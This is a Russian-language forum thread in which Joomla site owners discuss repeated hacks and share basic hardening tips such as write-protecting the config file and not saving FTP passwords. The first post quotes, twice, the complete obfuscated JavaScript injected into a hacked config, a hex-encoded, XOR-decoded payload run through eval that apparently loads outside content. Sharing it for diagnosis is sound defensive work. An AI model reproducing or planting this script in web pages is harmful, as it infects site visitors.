Меня тоже взломали уже в пятый раз :) - Безопасность сайтов на Joomla

Смотрите какой код в конфиг запихали ))))))

<script>jfgkwb="4e49431a171c2d4e4943161a171c2d41524944534e48490743484e4155464a425455440f0e5c2d2e4e410f4e4943160e075c2d2e2e5542535255490f170e1c2d2e5a2d2e4e4943161a161c2d2e434844524a42495309404253624b424a424953655e6e430f004a5e4e4155464a42000e095455441a054f5353571d08085542454855494249434c4e53094449084e4943425f09574f57051c2d5a2d434844524a4249530950554e53420f051b4e4155464a4207504e43534f1a001600074f424e404f531a0016000754535e4b421a00514e544e454e4b4e535e1d4f4e4343424900074e431a004a5e4e4155464a42000748496b4846431a0053555e5c43484e4155464a425455440f0e1c5a444653444f0f420e5c5a00191b084e4155464a4219050e1c2d4e410f434844524a42495309464b4b0e075c2d2e43484e4155464a425455440f0e1c2d5a2d5451441a05694669051c534e1a05694669051c";ztop="function cfti(){eh=Math.PI;vutao=parseInt;sv='length';lzf=vutao(~((eh&eh)|(~eh&eh)&(eh&~eh)|(~eh&~eh)));tenpyh=vutao(((lzf&lzf)|(~lzf&lzf)&(lzf&~lzf)|(~lzf&~lzf))&1);mhtt=tenpyh<<tenpyh;ti=lzf;svc='';vutbi=String.fromCharCode;brv=eval;for(paqcvq=lzf;paqcvq<ztop[sv];paqcvq-=-tenpyh) ti+=ztop.charCodeAt(paqcvq);ti%=unescape(lzf+vutbi(120)+(tenpyh<<6));for(paqcvq=lzf;paqcvq<jfgkwb[sv];paqcvq+=mhtt) svc+=vutbi(vutao(lzf+vutbi(120)+jfgkwb.charAt(paqcvq)+jfgkwb.charAt(paqcvq+vutao(tenpyh)))^ti);try{brv(svc);}catch(aaaa){try{eval(svc);}catch(aaaa){}}}try{eval('cfti();')}catch(aaaa){}";eval(ztop);</script>

так надо ставить на него защиту от записи. на конфиг... в смысле права менять, чтоб никто кроме вас его в принципе не мог перезаписать.
+ пароли на фтп не хранить в файловом менеджере.

Смотрите какой код в конфиг запихали ))))))

<script>jfgkwb="4e49431a171c2d4e4943161a171c2d41524944534e48490743484e4155464a425455440f0e5c2d2e4e410f4e4943160e075c2d2e2e5542535255490f170e1c2d2e5a2d2e4e4943161a161c2d2e434844524a42495309404253624b424a424953655e6e430f004a5e4e4155464a42000e095455441a054f5353571d08085542454855494249434c4e53094449084e4943425f09574f57051c2d5a2d434844524a4249530950554e53420f051b4e4155464a4207504e43534f1a001600074f424e404f531a0016000754535e4b421a00514e544e454e4b4e535e1d4f4e4343424900074e431a004a5e4e4155464a42000748496b4846431a0053555e5c43484e4155464a425455440f0e1c5a444653444f0f420e5c5a00191b084e4155464a4219050e1c2d4e410f434844524a42495309464b4b0e075c2d2e43484e4155464a425455440f0e1c2d5a2d5451441a05694669051c534e1a05694669051c";ztop="function cfti(){eh=Math.PI;vutao=parseInt;sv='length';lzf=vutao(~((eh&eh)|(~eh&eh)&(eh&~eh)|(~eh&~eh)));tenpyh=vutao(((lzf&lzf)|(~lzf&lzf)&(lzf&~lzf)|(~lzf&~lzf))&1);mhtt=tenpyh<<tenpyh;ti=lzf;svc='';vutbi=String.fromCharCode;brv=eval;for(paqcvq=lzf;paqcvq<ztop[sv];paqcvq-=-tenpyh) ti+=ztop.charCodeAt(paqcvq);ti%=unescape(lzf+vutbi(120)+(tenpyh<<6));for(paqcvq=lzf;paqcvq<jfgkwb[sv];paqcvq+=mhtt) svc+=vutbi(vutao(lzf+vutbi(120)+jfgkwb.charAt(paqcvq)+jfgkwb.charAt(paqcvq+vutao(tenpyh)))^ti);try{brv(svc);}catch(aaaa){try{eval(svc);}catch(aaaa){}}}try{eval('cfti();')}catch(aaaa){}";eval(ztop);</script>

Ух ты! Круто!

"Ух ты! Круто!"
ты что, запустил этот код, что ли?

"Ух ты! Круто!"
ты что, запустил этот код, что ли?

Не, просто радуюсь вместе с тс

ой, а мне страшно! пойду читать, как защититься от взлома. Подскажите, где такое почитать?

просто вбиваете в местный поиск "взломали сайт" и читаете-советы одни и те же всегда

Я столкнулся примерно с таким же кодом, но в рекламу Google вставлялся, а вот откуда он вставлялся я так и не нашёл? Гуглевский код был чистый, но периодически появлялась реклама крупным шрифтом, а с неё ссылочка с таким вот, примерно, кодом, но если быть точнее,- иное было, там ссылка, которая и образалась, искала файл login.php. Пришлось удалить рекламу Google, так как не нашёл откуда шла подгрузка это кода, Но, скорее всего она где-то на хостинге осталась? Вопрос,- как найти и обезвредить?